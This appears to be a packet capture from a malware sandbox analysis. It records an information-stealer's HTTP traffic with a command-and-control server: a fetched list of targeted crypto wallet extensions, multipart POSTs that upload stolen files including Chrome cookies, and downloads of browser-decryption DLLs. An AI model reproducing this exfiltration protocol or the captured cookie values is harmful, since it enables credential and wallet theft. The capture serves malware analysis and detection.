Oct 1, 2024 19:32:03.673232079 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:03 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 1, 2024 19:32:03.673247099 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Oct 1, 2024 19:32:03.673255920 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Oct 1, 2024 19:32:03.673269033 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Oct 1, 2024 19:32:03.673279047 CEST	896	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Oct 1, 2024 19:32:03.673289061 CEST	1236	IN	Data Raw: 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 64 74 63 47 4e 77 5a 32 78 77 62 6d 64 6b 62 32 46 73 59 6d 64 6c 62 32 78 6b 5a 57 46 71 5a 6d 4e 73 62 6d 68 68 5a 6d 46 38 4d 58 77 77 66 44 Data Ascii: amthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1qYmNmb2Zjb25rYW5uam9uZm1qamFqcGxsZGRiZ3wxfDB8MHx
Oct 1, 2024 19:32:03.673299074 CEST	268	IN	Data Raw: 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d 5a 73 5a 57 78 76 59 33 42 68 61 33 77 78 66 44 42 38 4d 48 78 55 54 30 34 67 56 32 46 73 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57 Data Ascii: dHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJ
Oct 1, 2024 19:32:03.675632000 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJECFHCBKKEBAKFIJDHI Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 32 36 34 38 32 66 36 37 63 63 35 33 32 64 34 64 36 30 37 30 37 36 36 32 31 66 37 38 61 64 38 32 65 32 39 39 62 64 66 66 30 66 38 64 35 63 35 64 38 36 37 37 61 66 36 61 36 34 32 30 35 34 30 66 33 33 30 64 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 2d 2d 0d 0a Data Ascii: ------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="token"b726482f67cc532d4d607076621f78ad82e299bdff0f8d5c5d8677af6a6420540f330d10------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="message"fplugins------KJECFHCBKKEBAKFIJDHI--
Oct 1, 2024 19:32:03.894610882 CEST	335	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:03 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 1, 2024 19:32:03.912065029 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHIDBKFCAAEBFIDHDBAE Host: 185.215.113.37 Content-Length: 7203 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 19:32:03.912121058 CEST	7203	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 32 36 34 38 Data Ascii: ------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="token"b726482f67cc532d4d607076621f78ad82e299bdff0f8d5c5d8677af6a6420540f330d10------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 1, 2024 19:32:04.801743984 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 19:32:04.802396059 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 1, 2024 19:32:05.019217014 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:04 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 1, 2024 19:32:05.019231081 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Oct 1, 2024 19:32:05.019242048 CEST	448	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Oct 1, 2024 19:32:07.864485979 CEST	952	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGHIIJDGHCBFIECBKEGH Host: 185.215.113.37 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 32 36 34 38 32 66 36 37 63 63 35 33 32 64 34 64 36 30 37 30 37 36 36 32 31 66 37 38 61 64 38 32 65 32 39 39 62 64 66 66 30 66 38 64 35 63 35 64 38 36 37 37 61 66 36 61 36 34 32 30 35 34 30 66 33 33 30 64 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="token"b726482f67cc532d4d607076621f78ad82e299bdff0f8d5c5d8677af6a6420540f330d10------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------BGHIIJDGHCBFIECBKEGH--
Oct 1, 2024 19:32:08.587246895 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:07 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 19:32:08.679845095 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJ Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 32 36 34 38 32 66 36 37 63 63 35 33 32 64 34 64 36 30 37 30 37 36 36 32 31 66 37 38 61 64 38 32 65 32 39 39 62 64 66 66 30 66 38 64 35 63 35 64 38 36 37 37 61 66 36 61 36 34 32 30 35 34 30 66 33 33 30 64 31 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="token"b726482f67cc532d4d607076621f78ad82e299bdff0f8d5c5d8677af6a6420540f330d10------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="file"------EGIIIECBGDHJJKFIDAKJ--
Oct 1, 2024 19:32:09.393002987 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 19:32:10.068871021 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIIIIEHCFIECAKFHJD Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 32 36 34 38 32 66 36 37 63 63 35 33 32 64 34 64 36 30 37 30 37 36 36 32 31 66 37 38 61 64 38 32 65 32 39 39 62 64 66 66 30 66 38 64 35 63 35 64 38 36 37 37 61 66 36 61 36 34 32 30 35 34 30 66 33 33 30 64 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="token"b726482f67cc532d4d607076621f78ad82e299bdff0f8d5c5d8677af6a6420540f330d10------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="file"------GDHIIIIEHCFIECAKFHJD--
Oct 1, 2024 19:32:10.780194044 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 19:32:11.128598928 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 1, 2024 19:32:11.361393929 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 1, 2024 19:32:12.379329920 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 1, 2024 19:32:12.596510887 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:12 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 1, 2024 19:32:13.044683933 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
